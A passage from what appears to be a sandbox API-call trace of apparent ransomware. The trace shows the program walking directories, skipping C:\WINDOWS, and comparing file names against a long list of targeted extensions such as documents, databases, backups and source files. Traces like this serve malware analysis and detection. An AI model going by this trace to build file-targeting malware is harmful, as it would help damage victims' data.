returned 4 [0167.004] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0167.004] lstrlenW (lpString=".cub") returned 4 [0167.004] lstrcmpiW (lpString1=".cub", lpString2=".ini") returned -1 [0167.004] lstrlenW (lpString=".dae") returned 4 [0167.004] lstrcmpiW (lpString1=".dae", lpString2=".ini") returned -1 [0167.004] lstrlenW (lpString=".dat") returned 4 [0167.004] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0167.004] lstrlenW (lpString=".db") returned 3 [0167.004] lstrcmpiW (lpString1=".db", lpString2="ini") returned -1 [0167.004] lstrlenW (lpString=".dbf") returned 4 [0167.004] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0167.004] lstrlenW (lpString=".dbx") returned 4 [0167.004] lstrcmpiW (lpString1=".dbx", lpString2=".ini") returned -1 [0167.005] lstrlenW (lpString=".dc3") returned 4 [0167.005] lstrcmpiW (lpString1=".dc3", lpString2=".ini") returned -1 [0167.005] lstrlenW (lpString=".dcm") returned 4 [0167.005] lstrcmpiW (lpString1=".dcm", lpString2=".ini") returned -1 [0167.005] lstrlenW (lpString=".dcr") returned 4 [0167.005] lstrcmpiW (lpString1=".dcr", lpString2=".ini") returned -1 [0167.005] lstrlenW (lpString=".der") returned 4 [0167.005] lstrcmpiW (lpString1=".der", lpString2=".ini") returned -1 [0167.005] lstrlenW (lpString=".dib") returned 4 [0167.005] lstrcmpiW (lpString1=".dib", lpString2=".ini") returned -1 [0167.005] lstrlenW (lpString=".dic") returned 4 [0167.005] lstrcmpiW (lpString1=".dic", lpString2=".ini") returned -1 [0167.005] lstrlenW (lpString=".dif") returned 4 [0167.005] lstrcmpiW (lpString1=".dif", lpString2=".ini") returned -1 [0167.005] lstrlenW (lpString=".divx") returned 5 [0167.005] lstrcmpiW (lpString1=".divx", lpString2="k.ini") returned -1 [0167.005] lstrlenW (lpString=".djvu") returned 5 [0167.005] lstrcmpiW (lpString1=".djvu", lpString2="k.ini") returned -1 [0167.005] lstrlenW (lpString=".dng") returned 4 [0167.005] lstrcmpiW (lpString1=".dng", lpString2=".ini") returned -1 [0167.005] lstrlenW (lpString=".doc") returned 4 [0167.005] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0167.005] lstrlenW (lpString=".docm") returned 5 [0167.005] lstrcmpiW (lpString1=".docm", lpString2="k.ini") returned -1 [0167.005] lstrlenW (lpString=".docx") returned 5 [0167.005] lstrcmpiW (lpString1=".docx", lpString2="k.ini") returned -1 [0167.005] lstrlenW (lpString=".dot") returned 4 [0167.005] lstrcmpiW (lpString1=".dot", lpString2=".ini") returned -1 [0167.006] lstrlenW (lpString=".dotm") returned 5 [0167.006] lstrcmpiW (lpString1=".dotm", lpString2="k.ini") returned -1 [0167.006] lstrlenW (lpString=".dotx") returned 5 [0167.006] lstrcmpiW (lpString1=".dotx", lpString2="k.ini") returned -1 [0167.006] lstrlenW (lpString=".dpx") returned 4 [0167.006] lstrcmpiW (lpString1=".dpx", lpString2=".ini") returned -1 [0167.006] lstrlenW (lpString=".dqy") returned 4 [0167.006] lstrcmpiW (lpString1=".dqy", lpString2=".ini") returned -1 [0167.006] lstrlenW (lpString=".dsn") returned 4 [0167.006] lstrcmpiW (lpString1=".dsn", lpString2=".ini") returned -1 [0167.006] lstrlenW (lpString=".dt") returned 3 [0167.006] lstrcmpiW (lpString1=".dt", lpString2="ini") returned -1 [0167.006] lstrlenW (lpString=".dtd") returned 4 [0167.006] lstrcmpiW (lpString1=".dtd", lpString2=".ini") returned -1 [0167.006] lstrlenW (lpString=".dwg") returned 4 [0167.006] lstrcmpiW (lpString1=".dwg", lpString2=".ini") returned -1 [0167.006] lstrlenW (lpString=".dwt") returned 4 [0167.006] lstrcmpiW (lpString1=".dwt", lpString2=".ini") returned -1 [0167.006] lstrlenW (lpString=".dx") returned 3 [0167.006] lstrcmpiW (lpString1=".dx", lpString2="ini") returned -1 [0167.006] lstrlenW (lpString=".dxf") returned 4 [0167.006] lstrcmpiW (lpString1=".dxf", lpString2=".ini") returned -1 [0167.006] lstrlenW (lpString=".edml") returned 5 [0167.006] lstrcmpiW (lpString1=".edml", lpString2="k.ini") returned -1 [0167.006] lstrlenW (lpString=".efd") returned 4 [0167.006] lstrcmpiW (lpString1=".efd", lpString2=".ini") returned -1 [0167.006] lstrlenW (lpString=".elf") returned 4 [0167.006] lstrcmpiW (lpString1=".elf", lpString2=".ini") returned -1 [0167.007] FindNextFileW (in: hFindFile=0x729458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x54acc791, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0x54acc791, ftLastWriteTime.dwHighDateTime=0x1d3273a, nFileSizeHigh=0x0, nFileSizeLow=0x241, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupComplete.cmd", cAlternateFileName="PARTNE~1.CMD")) returned 1 [0167.007] FindNextFileW (in: hFindFile=0x729458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9575af11, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9577d1ec, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="preoobe.cmd", cAlternateFileName="")) returned 1 [0167.007] FindNextFileW (in: hFindFile=0x729458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 1 [0167.007] FindNextFileW (in: hFindFile=0x729458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 0 [0167.007] FindClose (in: hFindFile=0x729458 | out: hFindFile=0x729458) returned 1 [0167.008] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0167.008] FindNextFileW (in: hFindFile=0x729318, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SafeOS", cAlternateFileName="")) returned 0 [0167.008] FindClose (in: hFindFile=0x729318 | out: hFindFile=0x729318) returned 1 [0167.009] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x31f0050 | out: hHeap=0x710000) returned 1 [0167.010] FindNextFileW (in: hFindFile=0x729758, lpFindFileData=0x2d6fcf8 | out: lpFindFileData=0x2d6fcf8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77970000, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0167.010] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x31f0050 [0167.011] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0167.011] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x729318 [0167.011] FindNextFileW (in: hFindFile=0x729318, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0167.011] FindNextFileW (in: hFindFile=0x729318, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0167.011] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18") returned 24 [0167.011] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\$Recycle.Bin\\S-1-5-18") returned 1 [0167.011] lstrlenW (lpString="S-1-5-18") returned 8 [0167.012] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="S-1-5-18") returned -1 [0167.012] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0167.012] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18") returned 24 [0167.012] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x729458 [0167.013] FindNextFileW (in: hFindFile=0x729458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.013] FindNextFileW (in: hFindFile=0x729458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0167.013] lstrlenW (lpString="desktop.ini") returned 11 [0167.013] lstrlenW (lpString=".1cd") returned 4 [0167.013] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0167.013] lstrlenW (lpString=".3ds") returned 4 [0167.013] lstrcmpiW (lpString1=".3ds", lpString2=".ini") returned -1 [0167.013] lstrlenW (lpString=".3fr") returned 4 [0167.013] lstrcmpiW (lpString1=".3fr", lpString2=".ini") returned -1 [0167.013] lstrlenW (lpString=".3g2") returned 4 [0167.013] lstrcmpiW (lpString1=".3g2", lpString2=".ini") returned -1 [0167.013] lstrlenW (lpString=".3gp") returned 4 [0167.013] lstrcmpiW (lpString1=".3gp", lpString2=".ini") returned -1 [0167.013] lstrlenW (lpString=".7z") returned 3 [0167.013] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0167.013] lstrlenW (lpString=".accda") returned 6 [0167.013] lstrcmpiW (lpString1=".accda", lpString2="op.ini") returned -1 [0167.013] lstrlenW (lpString=".accdb") returned 6 [0167.013] lstrcmpiW (lpString1=".accdb", lpString2="op.ini") returned -1 [0167.013] lstrlenW (lpString=".accdc") returned 6 [0167.013] lstrcmpiW (lpString1=".accdc", lpString2="op.ini") returned -1 [0167.013] lstrlenW (lpString=".accde") returned 6 [0167.013] lstrcmpiW (lpString1=".accde", lpString2="op.ini") returned -1 [0167.014] lstrlenW (lpString=".accdt") returned 6 [0167.014] lstrcmpiW (lpString1=".accdt", lpString2="op.ini") returned -1 [0167.014] lstrlenW (lpString=".accdw") returned 6 [0167.014] lstrcmpiW (lpString1=".accdw", lpString2="op.ini") returned -1 [0167.014] lstrlenW (lpString=".adb") returned 4 [0167.014] lstrcmpiW (lpString1=".adb", lpString2=".ini") returned -1 [0167.014] lstrlenW (lpString=".adp") returned 4 [0167.014] lstrcmpiW (lpString1=".adp", lpString2=".ini") returned -1 [0167.014] lstrlenW (lpString=".ai") returned 3 [0167.014] lstrcmpiW (lpString1=".ai", lpString2="ini") returned -1 [0167.014] lstrlenW (lpString=".ai3") returned 4 [0167.014] lstrcmpiW (lpString1=".ai3", lpString2=".ini") returned -1 [0167.014] lstrlenW (lpString=".ai4") returned 4 [0167.014] lstrcmpiW (lpString1=".ai4", lpString2=".ini") returned -1 [0167.014] lstrlenW (lpString=".ai5") returned 4 [0167.014] lstrcmpiW (lpString1=".ai5", lpString2=".ini") returned -1 [0167.014] lstrlenW (lpString=".ai6") returned 4 [0167.014] lstrcmpiW (lpString1=".ai6", lpString2=".ini") returned -1 [0167.014] lstrlenW (lpString=".ai7") returned 4 [0167.014] lstrcmpiW (lpString1=".ai7", lpString2=".ini") returned -1 [0167.014] lstrlenW (lpString=".ai8") returned 4 [0167.014] lstrcmpiW (lpString1=".ai8", lpString2=".ini") returned -1 [0167.014] lstrlenW (lpString=".anim") returned 5 [0167.014] lstrcmpiW (lpString1=".anim", lpString2="p.ini") returned -1 [0167.014] lstrlenW (lpString=".arw") returned 4 [0167.014] lstrcmpiW (lpString1=".arw", lpString2=".ini") returned -1 [0167.014] lstrlenW (lpString=".as") returned 3 [0167.014] lstrcmpiW (lpString1=".as", lpString2="ini") returned -1 [0167.015] lstrlenW (lpString=".asa") returned 4 [0167.015] lstrcmpiW (lpString1=".asa", lpString2=".ini") returned -1 [0167.015] lstrlenW (lpString=".asc") returned 4 [0167.015] lstrcmpiW (lpString1=".asc", lpString2=".ini") returned -1 [0167.015] lstrlenW (lpString=".ascx") returned 5 [0167.015] lstrcmpiW (lpString1=".ascx", lpString2="p.ini") returned -1 [0167.015] lstrlenW (lpString=".asm") returned 4 [0167.015] lstrcmpiW (lpString1=".asm", lpString2=".ini") returned -1 [0167.015] lstrlenW (lpString=".asmx") returned 5 [0167.015] lstrcmpiW (lpString1=".asmx", lpString2="p.ini") returned -1 [0167.015] lstrlenW (lpString=".asp") returned 4 [0167.015] lstrcmpiW (lpString1=".asp", lpString2=".ini") returned -1 [0167.015] lstrlenW (lpString=".aspx") returned 5 [0167.015] lstrcmpiW (lpString1=".aspx", lpString2="p.ini") returned -1 [0167.015] lstrlenW (lpString=".asr") returned 4 [0167.015] lstrcmpiW (lpString1=".asr", lpString2=".ini") returned -1 [0167.015] lstrlenW (lpString=".asx") returned 4 [0167.015] lstrcmpiW (lpString1=".asx", lpString2=".ini") returned -1 [0167.015] lstrlenW (lpString=".avi") returned 4 [0167.015] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0167.015] lstrlenW (lpString=".avs") returned 4 [0167.015] lstrcmpiW (lpString1=".avs", lpString2=".ini") returned -1 [0167.015] lstrlenW (lpString=".backup") returned 7 [0167.015] lstrcmpiW (lpString1=".backup", lpString2="top.ini") returned -1 [0167.015] lstrlenW (lpString=".bak") returned 4 [0167.015] lstrcmpiW (lpString1=".bak", lpString2=".ini") returned -1 [0167.015] lstrlenW (lpString=".bay") returned 4 [0167.015] lstrcmpiW (lpString1=".bay", lpString2=".ini") returned -1 [0167.015] lstrlenW (lpString=".bd") returned 3 [0167.016] lstrcmpiW (lpString1=".bd", lpString2="ini") returned -1 [0167.016] lstrlenW (lpString=".bin") returned 4 [0167.016] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1 [0167.016] lstrlenW (lpString=".bmp") returned 4 [0167.016] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0167.016] lstrlenW (lpString=".bz2") returned 4 [0167.016] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0167.016] lstrlenW (lpString=".c") returned 2 [0167.016] lstrcmpiW (lpString1=".c", lpString2="ni") returned -1 [0167.016] lstrlenW (lpString=".cdr") returned 4 [0167.016] lstrcmpiW (lpString1=".cdr", lpString2=".ini") returned -1 [0167.016] lstrlenW (lpString=".cer") returned 4 [0167.016] lstrcmpiW (lpString1=".cer", lpString2=".ini") returned -1 [0167.016] lstrlenW (lpString=".cf") returned 3 [0167.016] lstrcmpiW (lpString1=".cf", lpString2="ini") returned -1 [0167.016] lstrlenW (lpString=".cfc") returned 4 [0167.016] lstrcmpiW (lpString1=".cfc", lpString2=".ini") returned -1 [0167.016] lstrlenW (lpString=".cfm") returned 4 [0167.016] lstrcmpiW (lpString1=".cfm", lpString2=".ini") returned -1 [0167.016] lstrlenW (lpString=".cfml") returned 5 [0167.016] lstrcmpiW (lpString1=".cfml", lpString2="p.ini") returned -1 [0167.016] lstrlenW (lpString=".cfu") returned 4 [0167.016] lstrcmpiW (lpString1=".cfu", lpString2=".ini") returned -1 [0167.016] lstrlenW (lpString=".chm") returned 4 [0167.016] lstrcmpiW (lpString1=".chm", lpString2=".ini") returned -1 [0167.016] lstrlenW (lpString=".cin") returned 4 [0167.016] lstrcmpiW (lpString1=".cin", lpString2=".ini") returned -1 [0167.016] lstrlenW (lpString=".class") returned 6 [0167.017] lstrcmpiW (lpString1=".class", lpString2="op.ini") returned -1 [0167.017] lstrlenW (lpString=".clx") returned 4 [0167.017] lstrcmpiW (lpString1=".clx", lpString2=".ini") returned -1 [0167.017] lstrlenW (lpString=".config") returned 7 [0167.017] lstrcmpiW (lpString1=".config", lpString2="top.ini") returned -1 [0167.017] lstrlenW (lpString=".cpp") returned 4 [0167.017] lstrcmpiW (lpString1=".cpp", lpString2=".ini") returned -1 [0167.017] lstrlenW (lpString=".cr2") returned 4 [0167.017] lstrcmpiW (lpString1=".cr2", lpString2=".ini") returned -1 [0167.017] lstrlenW (lpString=".crt") returned 4 [0167.017] lstrcmpiW (lpString1=".crt", lpString2=".ini") returned -1 [0167.017] lstrlenW (lpString=".crw") returned 4 [0167.017] lstrcmpiW (lpString1=".crw", lpString2=".ini") returned -1 [0167.017] lstrlenW (lpString=".cs") returned 3 [0167.018] lstrcmpiW (lpString1=".cs", lpString2="ini") returned -1 [0167.018] lstrlenW (lpString=".css") returned 4 [0167.018] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0167.018] lstrlenW (lpString=".csv") returned 4 [0167.018] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0167.018] lstrlenW (lpString=".cub") returned 4 [0167.018] lstrcmpiW (lpString1=".cub", lpString2=".ini") returned -1 [0167.018] lstrlenW (lpString=".dae") returned 4 [0167.019] lstrcmpiW (lpString1=".dae", lpString2=".ini") returned -1 [0167.019] lstrlenW (lpString=".dat") returned 4 [0167.019] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0167.019] lstrlenW (lpString=".db") returned 3 [0167.019] lstrcmpiW (lpString1=".db", lpString2="ini") returned -1 [0167.019] lstrlenW (lpString=".dbf") returned 4 [0167.019] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0167.019] lstrlenW (lpString=".dbx") returned 4 [0167.019] lstrcmpiW (lpString1=".dbx", lpString2=".ini") returned -1 [0167.019] lstrlenW (lpString=".dc3") returned 4 [0167.019] lstrcmpiW (lpString1=".dc3", lpString2=".ini") returned -1 [0167.019] lstrlenW (lpString=".dcm") returned 4 [0167.019] lstrcmpiW (lpString1=".dcm", lpString2=".ini") returned -1 [0167.019] lstrlenW (lpString=".dcr") returned 4 [0167.019] lstrcmpiW (lpString1=".dcr", lpString2=".ini") returned -1 [0167.019] lstrlenW (lpString=".der") returned 4 [0167.019] lstrcmpiW (lpString1=".der", lpString2=".ini") returned -1 [0167.019] lstrlenW (lpString=".dib") returned 4 [0167.019] lstrcmpiW (lpString1=".dib", lpString2=".ini") returned -1 [0167.019] lstrlenW (lpString=".dic") returned 4 [0167.019] lstrcmpiW (lpString1=".dic", lpString2=".ini") returned -1 [0167.019] lstrlenW (lpString=".dif") returned 4 [0167.019] lstrcmpiW (lpString1=".dif", lpString2=".ini") returned -1 [0167.019] lstrlenW (lpString=".divx") returned 5 [0167.019] lstrcmpiW (lpString1=".divx", lpString2="p.ini") returned -1 [0167.019] lstrlenW (lpString=".djvu") returned 5 [0167.019] lstrcmpiW (lpString1=".djvu", lpString2="p.ini") returned -1 [0167.019] lstrlenW (lpString=".dng") returned 4 [0167.020] lstrcmpiW (lpString1=".dng", lpString2=".ini") returned -1 [0167.020] lstrlenW (lpString=".doc") returned 4 [0167.020] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0167.020] lstrlenW (lpString=".docm") returned 5 [0167.020] lstrcmpiW (lpString1=".docm", lpString2="p.ini") returned -1 [0167.020] lstrlenW (lpString=".docx") returned 5 [0167.020] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0167.020] lstrlenW (lpString=".dot") returned 4 [0167.020] lstrcmpiW (lpString1=".dot", lpString2=".ini") returned -1 [0167.020] lstrlenW (lpString=".dotm") returned 5 [0167.020] lstrcmpiW (lpString1=".dotm", lpString2="p.ini") returned -1 [0167.020] lstrlenW (lpString=".dotx") returned 5 [0167.020] lstrcmpiW (lpString1=".dotx", lpString2="p.ini") returned -1 [0167.020] lstrlenW (lpString=".dpx") returned 4 [0167.020] lstrcmpiW (lpString1=".dpx", lpString2=".ini") returned -1 [0167.020] lstrlenW (lpString=".dqy") returned 4 [0167.020] lstrcmpiW (lpString1=".dqy", lpString2=".ini") returned -1 [0167.020] lstrlenW (lpString=".dsn") returned 4 [0167.020] lstrcmpiW (lpString1=".dsn", lpString2=".ini") returned -1 [0167.020] lstrlenW (lpString=".dt") returned 3 [0167.020] lstrcmpiW (lpString1=".dt", lpString2="ini") returned -1 [0167.020] lstrlenW (lpString=".dtd") returned 4 [0167.020] lstrcmpiW (lpString1=".dtd", lpString2=".ini") returned -1 [0167.020] lstrlenW (lpString=".dwg") returned 4 [0167.020] lstrcmpiW (lpString1=".dwg", lpString2=".ini") returned -1 [0167.020] lstrlenW (lpString=".dwt") returned 4 [0167.020] lstrcmpiW (lpString1=".dwt", lpString2=".ini") returned -1 [0167.020] lstrlenW (lpString=".dx") returned 3 [0167.020] lstrcmpiW (lpString1=".dx", lpString2="ini") returned -1 [0167.021] lstrlenW (lpString=".dxf") returned 4 [0167.021] lstrcmpiW (lpString1=".dxf", lpString2=".ini") returned -1 [0167.021] lstrlenW (lpString=".edml") returned 5 [0167.021] lstrcmpiW (lpString1=".edml", lpString2="p.ini") returned -1 [0167.021] lstrlenW (lpString=".efd") returned 4 [0167.021] lstrcmpiW (lpString1=".efd", lpString2=".ini") returned -1 [0167.021] lstrlenW (lpString=".elf") returned 4 [0167.021] lstrcmpiW (lpString1=".elf", lpString2=".ini") returned -1 [0167.021] lstrlenW (lpString=".emf") returned 4 [0167.021] lstrcmpiW (lpString1=".emf", lpString2=".ini") returned -1 [0167.021] lstrlenW (lpString=".emz") returned 4 [0167.021] lstrcmpiW (lpString1=".emz", lpString2=".ini") returned -1 [0167.021] lstrlenW (lpString=".epf") returned 4 [0167.021] lstrcmpiW (lpString1=".epf", lpString2=".ini") returned -1 [0167.021] lstrlenW (lpString=".eps") returned 4 [0167.021] lstrcmpiW (lpString1=".eps", lpString2=".ini") returned -1 [0167.021] lstrlenW (lpString=".epsf") returned 5 [0167.021] lstrcmpiW (lpString1=".epsf", lpString2="p.ini") returned -1 [0167.021] lstrlenW (lpString=".epsp") returned 5 [0167.021] lstrcmpiW (lpString1=".epsp", lpString2="p.ini") returned -1 [0167.021] lstrlenW (lpString=".erf") returned 4 [0167.021] lstrcmpiW (lpString1=".erf", lpString2=".ini") returned -1 [0167.021] lstrlenW (lpString=".exr") returned 4 [0167.021] lstrcmpiW (lpString1=".exr", lpString2=".ini") returned -1 [0167.021] lstrlenW (lpString=".f4v") returned 4 [0167.021] lstrcmpiW (lpString1=".f4v", lpString2=".ini") returned -1 [0167.021] lstrlenW (lpString=".fido") returned 5 [0167.021] lstrcmpiW (lpString1=".fido", lpString2="p.ini") returned -1 [0167.021] lstrlenW (lpString=".flm") returned 4 [0167.022] lstrcmpiW (lpString1=".flm", lpString2=".ini") returned -1 [0167.022] lstrlenW (lpString=".flv") returned 4 [0167.022] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0167.022] lstrlenW (lpString=".frm") returned 4 [0167.022] lstrcmpiW (lpString1=".frm", lpString2=".ini") returned -1 [0167.022] lstrlenW (lpString=".fxg") returned 4 [0167.022] lstrcmpiW (lpString1=".fxg", lpString2=".ini") returned -1 [0167.022] lstrlenW (lpString=".geo") returned 4 [0167.022] lstrcmpiW (lpString1=".geo", lpString2=".ini") returned -1 [0167.022] lstrlenW (lpString=".gif") returned 4 [0167.022] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0167.022] lstrlenW (lpString=".grs") returned 4 [0167.022] lstrcmpiW (lpString1=".grs", lpString2=".ini") returned -1 [0167.022] lstrlenW (lpString=".gz") returned 3 [0167.022] lstrcmpiW (lpString1=".gz", lpString2="ini") returned -1 [0167.022] lstrlenW (lpString=".h") returned 2 [0167.022] lstrcmpiW (lpString1=".h", lpString2="ni") returned -1 [0167.022] lstrlenW (lpString=".hdr") returned 4 [0167.022] lstrcmpiW (lpString1=".hdr", lpString2=".ini") returned -1 [0167.022] lstrlenW (lpString=".hpp") returned 4 [0167.022] lstrcmpiW (lpString1=".hpp", lpString2=".ini") returned -1 [0167.022] lstrlenW (lpString=".hta") returned 4 [0167.022] lstrcmpiW (lpString1=".hta", lpString2=".ini") returned -1 [0167.022] lstrlenW (lpString=".htc") returned 4 [0167.022] lstrcmpiW (lpString1=".htc", lpString2=".ini") returned -1 [0167.022] lstrlenW (lpString=".htm") returned 4 [0167.022] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0167.022] lstrlenW (lpString=".html") returned 5 [0167.023] lstrcmpiW (lpString1=".html", lpString2="p.ini") returned -1 [0167.023] lstrlenW (lpString=".icb") returned 4 [0167.023] lstrcmpiW (lpString1=".icb", lpString2=".ini") returned -1 [0167.023] lstrlenW (lpString=".ics") returned 4 [0167.023] lstrcmpiW (lpString1=".ics", lpString2=".ini") returned -1 [0167.023] lstrlenW (lpString=".iff") returned 4 [0167.023] lstrcmpiW (lpString1=".iff", lpString2=".ini") returned -1 [0167.023] lstrlenW (lpString=".inc") returned 4 [0167.023] lstrcmpiW (lpString1=".inc", lpString2=".ini") returned -1 [0167.023] lstrlenW (lpString=".indd") returned 5 [0167.023] lstrcmpiW (lpString1=".indd", lpString2="p.ini") returned -1 [0167.023] lstrlenW (lpString=".ini") returned 4 [0167.023] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0167.023] lstrlenW (lpString="desktop.ini") returned 11 [0167.023] lstrlenW (lpString=".MSPLT") returned 6 [0167.023] lstrcmpiW (lpString1=".MSPLT", lpString2="op.ini") returned -1 [0167.023] lstrlenW 